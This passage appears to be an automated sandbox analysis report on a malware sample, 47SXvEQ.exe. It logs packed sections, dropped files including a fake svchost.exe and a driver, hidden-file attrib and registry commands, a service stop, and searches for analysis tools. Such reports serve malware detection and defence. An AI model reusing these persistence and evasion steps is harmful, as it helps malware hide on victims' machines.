                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA91C3 push rdi; iretd 5_2_00007FFDF0FA91C5
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA9C22 push rsp; retf 5_2_00007FFDF0FA9C23
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA6C41 push r10; ret 5_2_00007FFDF0FA6C43
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FAA305 push rsp; retf 5_2_00007FFDF0FAA306
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA9304 push r10; retf 5_2_00007FFDF0FA9370
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA857C push rbp; retf 5_2_00007FFDF0FA8595
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA9DA5 push rsp; iretq 5_2_00007FFDF0FA9DA6
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA85C7 push r12; ret 5_2_00007FFDF0FA8603
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA6E1B push rsp; ret 5_2_00007FFDF0FA6E23
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FAA4C9 push rdx; ret 5_2_00007FFDF0FAA520
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA6CEC push r8; ret 5_2_00007FFDF0FA6CF9
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA6D0A push rdx; ret 5_2_00007FFDF0FA6D11
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA6D16 push r12; ret 5_2_00007FFDF0FA6D18
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA8F73 push r12; iretd 5_2_00007FFDF0FA8F8A
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA6F74 push r8; ret 5_2_00007FFDF0FA6F7C
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA6FAD push r10; ret 5_2_00007FFDF0FA6FC0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA780A push rsi; ret 5_2_00007FFDF0FA7841
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA6E64 push rdi; iretd 5_2_00007FFDF0FA6E66
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA8E86 push rbp; iretq 5_2_00007FFDF0FA8E87
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA6EAC push rsp; iretd 5_2_00007FFDF0FA6EAD
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA6EBB push rsi; ret 5_2_00007FFDF0FA6EBC
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA6ED6 push r10; retf 5_2_00007FFDF0FA6ED9
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA6EF0 push r12; ret 5_2_00007FFDF0FA6F0E
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA8F1E push r12; ret 5_2_00007FFDF0FA8F45
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FA6F52 push r12; ret 5_2_00007FFDF0FA6F6A
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF153F22E pushfq ; retn 0003h5_2_00007FFDF153F2CD
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFE0C0AD39B push rsi; iretd 5_2_00007FFE0C0AD3A5
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFE0C0AD418 push rsi; retf 5_2_00007FFE0C0AD419
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFD9B79D2A5 pushad ; iretd 15_2_00007FFD9B79D2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFD9B8B19BC pushad ; ret 15_2_00007FFD9B8B19C9
                Source: 47SXvEQ.exeStatic PE information: section name: entropy: 7.694717025001675
                Source: 47SXvEQ.exeStatic PE information: section name: ypfntliq entropy: 7.952151955456021
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1

                Persistence and Installation Behavior

                barindex
                Source: C:\Users\user\AppData\Local\Temp\instals.exeFile created: C:\ProgramData\Microsoft\svchost.exeJump to dropped file
                Source: C:\ProgramData\Microsoft\svchost.exeFile created: C:\Windows\TEMP\qnibnfgnagzt.sys
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\_bz2.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\_ctypes.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\select.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\_ssl.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\_decimal.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\_hashlib.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\_socket.pydJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\rar.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\_queue.pydJump to dropped file
                Source: C:\Users\user\Desktop\47SXvEQ.exeFile created: C:\Users\user\AppData\Local\Temp\Built.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\libssl-1_1.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\VCRUNTIME140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\_sqlite3.pydJump to dropped file
                Source: C:\ProgramData\Microsoft\svchost.exeFile created: C:\Windows\Temp\qnibnfgnagzt.sysJump to dropped file
                Source: C:\Users\user\Desktop\47SXvEQ.exeFile created: C:\Users\user\AppData\Local\Temp\instals.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\libffi-7.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\python310.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\unicodedata.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\sqlite3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\instals.exeFile created: C:\ProgramData\Microsoft\svchost.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\libcrypto-1_1.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI54322\_lzma.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\instals.exeFile created: C:\ProgramData\Microsoft\svchost.exeJump to dropped file
                Source: C:\ProgramData\Microsoft\svchost.exeFile created: C:\Windows\Temp\qnibnfgnagzt.sysJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\47SXvEQ.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\47SXvEQ.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\instals.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF626645820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,4_2_00007FF626645820
                Source: C:\Users\user\Desktop\47SXvEQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
